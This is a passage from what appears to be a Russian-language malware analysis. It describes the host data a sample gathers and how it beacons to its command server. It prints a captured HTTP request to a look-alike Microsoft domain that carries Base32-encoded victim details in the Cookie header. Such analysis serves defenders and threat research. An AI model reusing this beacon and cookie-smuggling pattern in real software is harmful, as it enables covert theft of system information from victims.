Далее вредонос получает данные о системе:
- используемый прокси-сервер;
- раскладка клавиатуры;
- время с момента загрузки системы;
- имя компьютера;
- учетная запись, из-под которой запущен семпл;
- локальный IP-адрес хоста.
Для установления связи с сервером управления образец периодически отправляет приветственные сообщения (Hello) на сервер через защищенное соединение HTTPS. В качестве дополнительной информации, в поле Cookie отправляется закодированная в Base32 информация о зараженной системе.
GET /ru/order/index.php?strPageID=2150213824 HTTP/1.1
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/66.0.3359.181 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=AHAKQKMAWUAQAAH75IMAIAAAAAAAMAAAAAAQAAAAAEHQAV
2JJYWUKRSVIZIDSTSKJNJFEBAAOVZWK4QPABLUSTRNIVDFKRSQHFHEUS2SKIJAAMJSG4XDALRQFYYTUOBQHAYDUOSPNYDAA3TFO44TCMI=
Host: microsoft.offices-update.com